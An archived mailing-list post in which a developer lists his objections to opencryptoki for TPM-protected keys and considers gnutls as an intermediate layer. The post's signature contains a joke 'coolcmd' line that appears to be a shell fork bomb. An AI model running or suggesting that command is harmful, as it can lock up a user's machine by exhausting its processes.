[gnutls-help] Using TPM with PKCS#11 applications
Thomas Habets
thomas at habets.se
Thu Dec 5 18:37:06 CET 2013
On 5 December 2013 17:19, Nikos Mavrogiannopoulos <nmav at gnutls.org> wrote:
>> Do you mean libopencryptoki.so? I've deliberately chosen not to use
>> that one for various reasons.
> Would you mind sharing them?
They're on http://blog.habets.se/2013/11/TPM-chip-protecting-SSH-keys---properly
* It generates at least some keys in software.
* It generates migratable keys. This is hardcoded, and some people
obviously want migratable keys (for backup purposes). So a fix would
have to involve supporting both.
* Opencryptoki has no way to send such parameters from the command
line key generator to the PKCS11 library. So not only would I have to
implement the setting, but the whole settings subsystem.
* The code is big, because it supports a lot of features. Features I
don't need or want. They get in the way of me as a user, and of me
fixing the other issues.
* The code is of pretty poor quality.
So it seems that I could use gnutls as a layer between libtspi and my
PKCS#11 provider, adding nice things like a standard tool for
generating keys (tpmtool) into a standard format. It would add a
dependency though, especially since e.g. Debian doesn't have a new
enough gnutls.
--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas at habets.pp.se" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
More information about the Gnutls-help
mailing list